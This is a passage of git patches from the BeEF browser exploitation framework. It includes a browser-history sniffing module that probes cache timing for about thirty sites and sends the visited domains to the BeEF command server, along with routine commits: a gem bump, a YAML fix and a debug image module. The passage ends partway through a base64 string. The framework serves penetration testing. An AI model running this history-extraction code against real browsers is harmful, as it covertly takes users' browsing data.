+	slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
+	myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
+	engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
+        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
+        pandora: 'http://www.pandora.com/img/logo.png',
+        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
+        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
+        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
+        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
+        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
+        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
+        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
+        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
+        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
+        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
+        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
+        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
+	walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
+	perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
+        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
+	msy: 'http://msy.com.au/images/MSYLogo-long.gif',
+	techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
+	borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
+	mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
+	anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
+	tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
+	shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
+	staticice: 'http://staticice.com.au/images/banner.jpg',
+  };
+
+  var sites = [];
+  for (var k in tests)
+    sites.push(k);
+   sites.reverse();
+
+   vp = visipisi.webkit;
+   var first_site = sites.pop();
+   var end = function() {
+    	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
+   }
+   vp(tests[first_site], function(result) {
+	visipisiCB(vp, end, sites, tests, first_site, result);
+    });
+}
+
+function prepResult(results){
+    var result_str ='<br>';
+    for(r in results){
+      result_str += r + ':' + results[r]+'<br>';
+    }
+    return result_str;
+}
 
 beef.execute(function() { 
+  if(beef.browser.isC() == 1){
+	getVisitedDomains();
+
+  } else {  
    urls = undefined;
    exec_next = null;
    start_stuff();
+ }
 });
 
 	
diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml
index f253fef1d..c0bc6991c 100644
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -10,7 +10,7 @@ beef:
             category: "Browser"
             name: "Get Visited Domains"
             description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["@keith55", "quentin"]
+            authors: ["@keith55","oxplot","quentin"]
             target:
                 working: ["FF", "IE", "O"]
                 not_working: ["C", "S"]

From 4ea18852f6655994d1e5d49ed1254c1fd573d3b5 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 21 Apr 2013 10:52:46 +0100
Subject: [PATCH 279/397] Updated eventmachine gem version in Gemfile.

---
 Gemfile | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/Gemfile b/Gemfile
index c86d6c0a2..96fc0dfc8 100644
--- a/Gemfile
+++ b/Gemfile
@@ -9,11 +9,9 @@
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
 gem "sinatra", "1.3.2"
 gem "em-websocket", "~> 0.3.6"

From 719bb4a20be7bb417d406b4e75f4b97fdd266ab2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 25 Apr 2013 01:37:15 +0930
Subject: [PATCH 280/397] Fixed malformed YAML in
 modules/browser/get_visited_domains/config.yaml

---
 modules/browser/get_visited_domains/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml
index c0bc6991c..beef87ab1 100644
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -10,7 +10,7 @@ beef:
             category: "Browser"
             name: "Get Visited Domains"
             description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["@keith55","oxplot","quentin"]
+            authors: ["@keith55", "oxplot", "quentin"]
             target:
                 working: ["FF", "IE", "O"]
                 not_working: ["C", "S"]

From 88678f986cc805c37bda58246c803faad794e3cc Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 30 Apr 2013 18:40:25 +0930
Subject: [PATCH 281/397] Add 'Debug -> Test Return Image' module

Part of isse #883
---
 modules/debug/test_return_image/command.js  | 12 ++++++++++++
 modules/debug/test_return_image/config.yaml | 15 +++++++++++++++
 modules/debug/test_return_image/module.rb   | 14 ++++++++++++++
 3 files changed, 41 insertions(+)
 create mode 100644 modules/debug/test_return_image/command.js
 create mode 100644 modules/debug/test_return_image/config.yaml
 create mode 100644 modules/debug/test_return_image/module.rb

diff --git a/modules/debug/test_return_image/command.js b/modules/debug/test_return_image/command.js
new file mode 100644
index 000000000..788dbac2f
--- /dev/null
+++ b/modules/debug/test_return_image/command.js
@@ -0,0 +1,12 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=data:image/png;base64,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